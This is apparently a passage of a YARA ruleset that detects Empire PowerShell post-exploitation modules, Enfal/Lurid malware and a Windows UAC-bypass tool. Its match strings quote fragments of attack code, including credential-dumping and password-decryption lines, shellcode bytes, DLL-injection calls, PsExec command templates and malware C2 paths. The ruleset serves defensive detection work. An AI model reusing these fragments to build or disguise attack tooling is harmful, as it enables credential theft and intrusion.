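        $x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
    condition:
        (uint16(0) == 0x2023 and filesize < 60KB and 1 of them) or all of them
}

rule Empire_Install_SSP {
    meta:
        description = "Detects Empire component - file Install-SSP.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
    strings:
        $s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 20KB and 1 of them) or all of them
}

rule Empire_Invoke_ShellcodeMSIL {
    meta:
        description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
    strings:
        $s1 = "$FinalShellcode.Length" fullword ascii
        $s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
        $s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
        $s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 30KB and 1 of them) or all of them
}

// Rule name carries the generating workstation path; kept for compatibility
// with anything referencing it by name.
rule Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp {
    meta:
        description = "Detects Empire component - file PowerUp.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
    strings:
        $x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
    condition:
        (uint16(0) == 0x233c and filesize < 2000KB and 1 of them) or all of them
}

// $s1 is the start of a base64-encoded PE ("TVqQ..." decodes to "MZ\x90"),
// so this also catches other scripts embedding a DLL the same way.
rule Empire_Invoke_Mimikatz_Gen {
    meta:
        description = "Detects Empire component - file Invoke-Mimikatz.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    strings:
        $s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
        $s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 4000KB and 1 of them) or all of them
}

rule Empire_Get_GPPPassword {
    meta:
        description = "Detects Empire component - file Get-GPPPassword.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
    strings:
        $s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
        $s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
        $s3 = "function Get-DecryptedCpassword {" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 30KB and 1 of them) or all of them
}

rule Empire_Invoke_SmbScanner {
    meta:
        description = "Detects Empire component - file Invoke-SmbScanner.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
    strings:
        // note the trailing space inside $s1; it is part of the matched line
        $s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
        $s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
    condition:
        (uint16(0) == 0x7566 and filesize < 10KB and 1 of them) or all of them
}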
// Empire component rules (PowerShell post-exploitation framework).
// The uint16(0) gates below are the first two file bytes read little-endian:
//   0x7566 = "fu"   (file starts with "function")
//   0x233c = "<#"   (PowerShell block comment)
//   0x7223 = "#r"   (a "#..." directive line, e.g. "#requires")
//   0x660a = "\nf", 0x490a = "\nI" (leading newline, then the first letter)
//   0x5a4d = "MZ"   (PE image)
// Each rule also fires on "all of them" without the gate.

rule Empire_Exploit_JBoss {
    meta:
        description = "Detects Empire component - file Exploit-JBoss.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
    strings:
        $s1 = "Exploit-JBoss" fullword ascii
        $s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
        $s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
        $s4 = "http://blog.rvrsh3ll.net" fullword ascii
        $s5 = "Remote URL to your own WARFile to deploy." fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}

rule Empire_dumpCredStore {
    meta:
        description = "Detects Empire component - file dumpCredStore.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
    strings:
        // P/Invoke declaration for CredReadW plus two literal messages from the script
        $x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
        $s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
        $s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
    condition:
        ( uint16(0) == 0x233c and filesize < 40KB and 1 of them ) or all of them
}

rule Empire_Invoke_EgressCheck {
    meta:
        description = "Detects Empire component - file Invoke-EgressCheck.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
    strings:
        $s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
    condition:
        ( uint16(0) == 0x233c and filesize < 10KB and 1 of them ) or all of them
}

// The one PE rule in this group: the x64 ReflectivePick loader DLL (PDB path and
// module names).
rule Empire_ReflectivePick_x64_orig {
    meta:
        description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
    strings:
        $s1 = "\\PowerShellRunner.pdb" fullword ascii
        $s2 = "PowerShellRunner.dll" fullword wide
        $s3 = "ReflectivePick_x64.dll" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them ) or all of them
}

rule Empire_Out_Minidump {
    meta:
        description = "Detects Empire component - file Out-Minidump.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
    strings:
        $s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
        $s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
}

rule Empire_Invoke_PsExec {
    meta:
        description = "Detects Empire component - file Invoke-PsExec.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
    strings:
        $s1 = "Invoke-PsExecCmd" fullword ascii
        $s2 = "\"[*] Executing service .EXE" fullword ascii
        $s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
}

// Very small script (< 2KB); both strings are plain comment/help text.
rule Empire_Invoke_PostExfil {
    meta:
        description = "Detects Empire component - file Invoke-PostExfil.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
    strings:
        $s1 = "# upload to a specified exfil URI" fullword ascii
        $s2 = "Server path to exfil to." fullword ascii
    condition:
        ( uint16(0) == 0x490a and filesize < 2KB and 1 of them ) or all of them
}

rule Empire_Invoke_SMBAutoBrute {
    meta:
        description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
    strings:
        // $s1 is an example hostname from the script's help text
        $s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
        $s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}

rule Empire_Get_Keystrokes {
    meta:
        description = "Detects Empire component - file Get-Keystrokes.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
    strings:
        $s1 = "$RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
}

// Single short string from the script's usage example; the size and prefix gate
// carry most of the specificity here.
rule Empire_Invoke_DllInjection {
    meta:
        description = "Detects Empire component - file Invoke-DllInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
    strings:
        $s1 = "-Dll evil.dll" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
}

rule Empire_KeePassConfig {
    meta:
        description = "Detects Empire component - file KeePassConfig.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
    strings:
        $s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
    condition:
        ( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}

rule Empire_Invoke_SSHCommand {
    meta:
        description = "Detects Empire component - file Invoke-SSHCommand.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
    strings:
        // $s1: start of an embedded base64 PE; $s2: the help-text usage example
        $s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
        $s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
        $s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
    condition:
        ( uint16(0) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
}

/* Super Rules ------------------------------------------------------------- */
/* Generated across several Empire files at once (super_rule = 1); where a
   description names the same file twice, that is an artifact of the generator,
   not two distinct files. */

rule Empire_PowerShell_Framework_Gen1 {
    meta:
        description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
        hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
        $s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}

rule Empire_PowerUp_Gen {
    meta:
        description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
    strings:
        $s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
        $s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
    condition:
        ( uint16(0) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
}

rule Empire_PowerShell_Framework_Gen2 {
    meta:
        description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-ReflectivePEInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        // hash numbering is non-contiguous as generated; kept as-is
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
        hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
        $s20 = "#Shellcode: CallDllMain.asm" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}

rule Empire_Agent_Gen {
    meta:
        description = "Detects Empire component - from files agent.ps1, agent.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        // NOTE(review): hash1 and hash2 are the same value (generator duplicated the file)
        hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
        hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
    strings:
        // beaconing agent: User-Agent header set-up and delay/jitter arithmetic
        $s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
        $s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
        $s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
    condition:
        ( uint16(0) == 0x660a and filesize < 100KB and 1 of them ) or all of them
}

rule Empire_PowerShell_Framework_Gen3 {
    meta:
        description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
        hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
        // $s2 is a short comment fragment; on its own it is weak, hence the gate
        $s2 = "remote DLL injection" ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}

rule Empire_Invoke_InveighRelay_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
    strings:
        $s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
        $s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
}

rule Empire_KeePassConfig_Gen {
    meta:
        description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
    strings:
        $s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
    condition:
        ( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}

rule Empire_Invoke_Portscan_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
    strings:
        $s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
        $s2 = "1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
}

// Shared PSReflect-style helper code present in many Empire modules.
rule Empire_PowerShell_Framework_Gen4 {
    meta:
        description = "Detects Empire component - from files Invoke-BypassUAC.ps1, Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DllInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PsExec.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-Shellcode.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
        hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
        hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
        hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
        hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
        hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
    strings:
        $s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
        // $s2 is a bare comment line; it is the weakest of the four
        $s2 = "# Get a handle to the module specified" fullword ascii
        $s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
        $s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}

rule Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    strings:
        // $s2 is a prefix of $s1; either form of the call line matches
        $s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii
        $s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}

rule Empire_Invoke_Gen {
    meta:
        description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
        hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $s1 = "$Shellcode1 += 0x48" fullword ascii
        $s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
}

rule Empire_PowerShell_Framework_Gen5 {
    meta:
        description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
        author = "Florian Roth"
        reference = "https://github.com/adaptivethreat/Empire"
        date = "2016-11-05"
        super_rule = 1
        hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
        hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
        hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
        $s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
    condition:
        ( uint16(0) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Enfal / Lurid family (Seth Hardy). EnfalCode and EnfalStrings are combined
// by the Enfal rule below.
rule EnfalCode : Enfal Family {
    meta:
        description = "Enfal code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        // mov al, 20h; sub al, bl; add [ebx+esi], al; push esi; inc ebx; call edi; cmp ebx, eax
        $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
    condition:
        any of them
}

rule EnfalStrings : Enfal Family {
    meta:
        description = "Enfal Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        // PDB paths, internal names and C2 URI fragments; the \x.. sequences are
        // UTF-8 bytes of non-ASCII path components
        $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
        $ = "e:\\programs\\LuridDownLoader"
        $ = "LuridDownloader for Falcon"
        $ = "DllServiceTrojan"
        $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
        $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
        $ = "Madonna\x00Jesus"
        $ = "/iupw82/netstate"
        $ = "fuckNodAgain"
        $ = "iloudermao"
        $ = "Crpq2.cgi"
        $ = "Clnpp5.cgi"
        $ = "Dqpq3ll.cgi"
        $ = "dieosn83.cgi"
        $ = "Rwpq1.cgi"
        $ = "/Ccmwhite"
        $ = "/Cmwhite"
        $ = "/Crpwhite"
        $ = "/Dfwhite"
        $ = "/Query.txt"
        $ = "/Ufwhite"
        $ = "/cgl-bin/Clnpp5.cgi"
        $ = "/cgl-bin/Crpq2.cgi"
        $ = "/cgl-bin/Dwpq3ll.cgi"
        $ = "/cgl-bin/Owpq4.cgi"
        $ = "/cgl-bin/Rwpq1.cgi"
        $ = "/trandocs/mm/"
        $ = "/trandocs/netstat"
        $ = "NFal.exe"
        $ = "LINLINVMAN"
        $ = "7NFP4R9W"
    condition:
        any of them
}

// Umbrella rule: true when either of the two Enfal rules above matches.
rule Enfal : Family {
    meta:
        description = "Enfal"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    condition:
        EnfalCode or EnfalStrings
}

// Requires every string, so the generic environment-variable names alone do
// not trigger it.
rule Enfal_Malware {
    meta:
        description = "Detects a certain type of Enfal Malware"
        author = "Florian Roth"
        reference = "not set"
        date = "2015/02/10"
        hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
        score = 60
    strings:
        $s0 = "POWERPNT.exe" fullword ascii
        $s1 = "%APPDATA%\\Microsoft\\Windows\\" fullword ascii
        $s2 = "%HOMEPATH%" fullword ascii
        $s3 = "Server2008" fullword ascii
        $s4 = "Server2003" fullword ascii
        $s5 = "Server2003R2" fullword ascii
        $s6 = "Server2008R2" fullword ascii
        $s9 = "%HOMEDRIVE%" fullword ascii
        $s13 = "%ComSpec%" fullword ascii
    condition:
        all of them
}

rule Enfal_Malware_Backdoor {
    meta:
        description = "Generic Rule to detect the Enfal Malware"
        author = "Florian Roth"
        date = "2015/02/10"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
        score = 60
    strings:
        // "MZ" as a hex string anchored at offset 0 (same effect as uint16(0) == 0x5a4d)
        $mz = { 4d 5a }
        // typo'd vendor/service names are the strong indicators
        $x1 = "Micorsoft Corportation" fullword wide
        $x2 = "IM Monnitor Service" fullword wide
        $s1 = "imemonsvc.dll" fullword wide
        $s2 = "iphlpsvc.tmp" fullword
        $z1 = "urlmon" fullword
        $z2 = "Registered trademarks and service marks are the property of their respec" wide
        $z3 = "XpsUnregisterServer" fullword
        $z4 = "XpsRegisterServer" fullword
        $z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
    condition:
        ( $mz at 0 ) and ( 1 of ($x*) or ( all of ($s*) and all of ($z*) ) )
}

// CMSTAR downloader: all seven CRLF-terminated debug tokens must be present.
// NOTE(review): meta keys are capitalised here unlike the rest of this file.
rule ce_enfal_cmstar_debug_msg {
    meta:
        Author = "rfalcone"
        Date = "2015.05.10"
        Description = "Detects the static debug strings within CMSTAR"
        Reference = "http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin"
    strings:
        $d1 = "EEE\x0d\x0a" fullword
        $d2 = "TKE\x0d\x0a" fullword
        $d3 = "VPE\x0d\x0a" fullword
        $d4 = "VPS\x0d\x0a" fullword
        $d5 = "WFSE\x0d\x0a" fullword
        $d6 = "WFSS\x0d\x0a" fullword
        $d7 = "CM**\x0d\x0a" fullword
    condition:
        uint16(0) == 0x5a4d and all of ($d*)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

// UAC-bypass tooling. $x* strings are tool-specific; the $s* set is generic
// (runtime and API names) and only counts when all of it is present.
rule Win7Elevatev2 {
    meta:
        description = "Detects Win7Elevate - Windows UAC bypass utility"
        author = "Florian Roth"
        reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
        date = "2015-05-14"
        hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29" /* x64 */
        hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1" /* x86 */
        score = 60
    strings:
        $x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
        $x2 = "Win7ElevateV2\\x64\\Release\\" ascii
        $x3 = "Run the command normally (without code injection)" wide
        $x4 = "Inject file copy && elevate command" fullword wide
        $x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" fullword wide
